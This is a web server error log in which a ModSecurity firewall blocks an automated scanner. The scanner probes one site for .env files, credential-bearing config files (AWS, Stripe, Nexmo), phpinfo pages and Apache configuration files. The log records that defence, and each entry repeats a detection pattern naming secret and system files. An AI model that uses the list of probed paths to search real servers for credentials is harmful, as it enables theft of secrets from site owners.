[Tue May 26 15:32:40.066281 2026] [security2:error] [pid 724639:tid 724858] [client 195.178.110.199:50380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/administrator/.env"] [unique_id "ahVvwBKJRbiNp3eWdT1sGwAAAN4"]
[Tue May 26 15:32:40.180221 2026] [security2:error] [pid 724639:tid 724772] [client 195.178.110.199:50474] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/api-backend/.env"] [unique_id "ahVvwBKJRbiNp3eWdT1sIgAAAIg"]
[Tue May 26 15:32:40.230307 2026] [security2:error] [pid 724639:tid 724815] [client 195.178.110.199:50484] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/api-node/.env"] [unique_id "ahVvwBKJRbiNp3eWdT1sJAAAALM"]
[Tue May 26 15:32:40.269222 2026] [security2:error] [pid 724639:tid 724810] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvvxKJRbiNp3eWdT1sDwAAAK4"]
[Tue May 26 15:32:40.308787 2026] [security2:error] [pid 724639:tid 724896] [client 195.178.110.199:50458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/api/.env"] [unique_id "ahVvwBKJRbiNp3eWdT1sJgAAAQQ"]
[Tue May 26 15:32:40.608409 2026] [security2:error] [pid 724639:tid 724847] [client 195.178.110.199:50400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/api/info.php"] [unique_id "ahVvwBKJRbiNp3eWdT1sNAAAANM"]
[Tue May 26 15:32:40.970424 2026] [security2:error] [pid 724639:tid 724801] [client 195.178.110.199:50438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/api/phpinfo.php"] [unique_id "ahVvwBKJRbiNp3eWdT1sSwAAAKU"]
[Tue May 26 15:32:41.035390 2026] [security2:error] [pid 724639:tid 724788] [client 195.178.110.199:50414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/apis/.env"] [unique_id "ahVvwRKJRbiNp3eWdT1sTgAAAJg"]
[Tue May 26 15:32:41.487650 2026] [security2:error] [pid 724639:tid 724885] [client 195.178.110.199:50484] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/app/.env"] [unique_id "ahVvwRKJRbiNp3eWdT1sagAAAPk"]
[Tue May 26 15:32:41.786920 2026] [security2:error] [pid 724639:tid 724784] [client 195.178.110.199:50414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/application/.env"] [unique_id "ahVvwRKJRbiNp3eWdT1sggAAAJQ"]
[Tue May 26 15:32:41.798736 2026] [security2:error] [pid 724639:tid 724798] [client 195.178.110.199:50396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/apps/.env"] [unique_id "ahVvwRKJRbiNp3eWdT1sgwAAAKI"]
[Tue May 26 15:32:42.205049 2026] [security2:error] [pid 724639:tid 724771] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvwRKJRbiNp3eWdT1sgAAAAIc"]
[Tue May 26 15:32:43.405286 2026] [security2:error] [pid 724639:tid 724712] [remote 46.101.75.237:48226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVvwxKJRbiNp3eWdT1stgAAvEg"]
[Tue May 26 15:32:44.384131 2026] [security2:error] [pid 724639:tid 724844] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvwxKJRbiNp3eWdT1s1QAAANA"]
[Tue May 26 15:32:44.393013 2026] [security2:error] [pid 724639:tid 724871] [client 195.178.110.199:50414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/back-api/.env"] [unique_id "ahVvxBKJRbiNp3eWdT1s7AAAAOs"]
[Tue May 26 15:32:44.475586 2026] [security2:error] [pid 724639:tid 724834] [client 195.178.110.199:47148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/back-end/.env"] [unique_id "ahVvxBKJRbiNp3eWdT1s8AAAAMY"]
[Tue May 26 15:32:44.476403 2026] [security2:error] [pid 724639:tid 724889] [client 195.178.110.199:50484] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/backend-api/.env"] [unique_id "ahVvxBKJRbiNp3eWdT1s8QAAAP0"]
[Tue May 26 15:32:44.485261 2026] [security2:error] [pid 724639:tid 724858] [client 195.178.110.199:50526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVvxBKJRbiNp3eWdT1s8wAAAN4"]
[Tue May 26 15:32:44.848349 2026] [security2:error] [pid 724639:tid 724885] [client 195.178.110.199:50414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/backup/.env"] [unique_id "ahVvxBKJRbiNp3eWdT1tBAAAAPk"]
[Tue May 26 15:32:44.894314 2026] [security2:error] [pid 724639:tid 724841] [client 195.178.110.199:50380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/back/.env"] [unique_id "ahVvxBKJRbiNp3eWdT1tCAAAAM0"]
[Tue May 26 15:32:45.194419 2026] [security2:error] [pid 724639:tid 724791] [client 195.178.110.199:50380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/cms/.env"] [unique_id "ahVvxRKJRbiNp3eWdT1tFgAAAJs"]
[Tue May 26 15:32:45.295049 2026] [security2:error] [pid 724639:tid 724817] [client 195.178.110.199:50484] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/be/.env"] [unique_id "ahVvxRKJRbiNp3eWdT1tHwAAALU"]
[Tue May 26 15:32:45.308059 2026] [security2:error] [pid 724639:tid 724813] [client 195.178.110.199:50540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/beta/.env"] [unique_id "ahVvxRKJRbiNp3eWdT1tIAAAALE"]
[Tue May 26 15:32:45.434728 2026] [security2:error] [pid 724639:tid 724883] [client 195.178.110.199:50458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/client/.env"] [unique_id "ahVvxRKJRbiNp3eWdT1tKwAAAPc"]
[Tue May 26 15:32:45.840401 2026] [security2:error] [pid 724639:tid 724894] [client 195.178.110.199:50474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config.php"] [unique_id "ahVvxRKJRbiNp3eWdT1tOAAAAQI"]
[Tue May 26 15:32:45.979012 2026] [security2:error] [pid 724639:tid 724871] [client 195.178.110.199:50524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/config/.env"] [unique_id "ahVvxRKJRbiNp3eWdT1tQAAAAOs"]
[Tue May 26 15:32:46.071165 2026] [security2:error] [pid 724639:tid 724832] [client 195.178.110.199:50548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/config.php"] [unique_id "ahVvxhKJRbiNp3eWdT1tSAAAAMQ"]
[Tue May 26 15:32:46.138452 2026] [security2:error] [pid 724639:tid 724794] [client 195.178.110.199:50372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/aws.php"] [unique_id "ahVvxhKJRbiNp3eWdT1tSgAAAJ4"]
[Tue May 26 15:32:46.175679 2026] [security2:error] [pid 724639:tid 724831] [client 195.178.110.199:50526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/env.php"] [unique_id "ahVvxhKJRbiNp3eWdT1tTgAAAMM"]
[Tue May 26 15:32:46.241420 2026] [security2:error] [pid 724639:tid 724810] [client 195.178.110.199:50396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/module.config.php"] [unique_id "ahVvxhKJRbiNp3eWdT1tVAAAAK4"]
[Tue May 26 15:32:46.301994 2026] [security2:error] [pid 724639:tid 724896] [client 195.178.110.199:50540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/config.inc.php"] [unique_id "ahVvxhKJRbiNp3eWdT1tVQAAAQQ"]
[Tue May 26 15:32:46.715638 2026] [security2:error] [pid 724639:tid 724784] [client 195.178.110.199:50380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/stripe.php"] [unique_id "ahVvxhKJRbiNp3eWdT1tcwAAAJQ"]
[Tue May 26 15:32:46.791755 2026] [security2:error] [pid 724639:tid 724861] [client 195.178.110.199:50414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/config/nexmo.php"] [unique_id "ahVvxhKJRbiNp3eWdT1tegAAAOE"]
[Tue May 26 15:32:46.910597 2026] [security2:error] [pid 724639:tid 724821] [client 195.178.110.199:50524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/crm/.env"] [unique_id "ahVvxhKJRbiNp3eWdT1tggAAALk"]
[Tue May 26 15:32:46.942422 2026] [security2:error] [pid 724639:tid 724778] [client 195.178.110.199:47272] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/current/.env"] [unique_id "ahVvxhKJRbiNp3eWdT1thgAAAI4"]
[Tue May 26 15:32:46.953035 2026] [security2:error] [pid 724639:tid 724894] [client 195.178.110.199:47144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/demo/.env"] [unique_id "ahVvxhKJRbiNp3eWdT1tiAAAAQI"]
[Tue May 26 15:32:46.987299 2026] [security2:error] [pid 724639:tid 724795] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvxhKJRbiNp3eWdT1taQAAAJ8"]
[Tue May 26 15:32:47.002689 2026] [security2:error] [pid 724639:tid 724782] [client 195.178.110.199:47148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/dev/.env"] [unique_id "ahVvxxKJRbiNp3eWdT1tjAAAAJI"]
[Tue May 26 15:32:47.063049 2026] [security2:error] [pid 724639:tid 724819] [client 195.178.110.199:50524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/develop/.env"] [unique_id "ahVvxxKJRbiNp3eWdT1tjQAAALc"]
[Tue May 26 15:32:47.179282 2026] [security2:error] [pid 724639:tid 724839] [client 195.178.110.199:47240] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/cron/.env"] [unique_id "ahVvxxKJRbiNp3eWdT1tkAAAAMs"]
[Tue May 26 15:32:47.346797 2026] [security2:error] [pid 724639:tid 724877] [client 195.178.110.199:47156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/developer/.env"] [unique_id "ahVvxxKJRbiNp3eWdT1tmwAAAPE"]
[Tue May 26 15:32:47.376990 2026] [security2:error] [pid 724639:tid 724774] [client 195.178.110.199:50460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/development/.env"] [unique_id "ahVvxxKJRbiNp3eWdT1tnQAAAIo"]
[Tue May 26 15:32:47.397990 2026] [cgid:error] [pid 724639:tid 724860] [client 195.178.110.199:47166] AH01264: stderr from /home2/jhonwy9v/stvica.com/dnscfg.cgi: script not found or unable to stat
[Tue May 26 15:32:47.727045 2026] [security2:error] [pid 724639:tid 724861] [client 195.178.110.199:47272] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVvxxKJRbiNp3eWdT1twgAAAOE"]
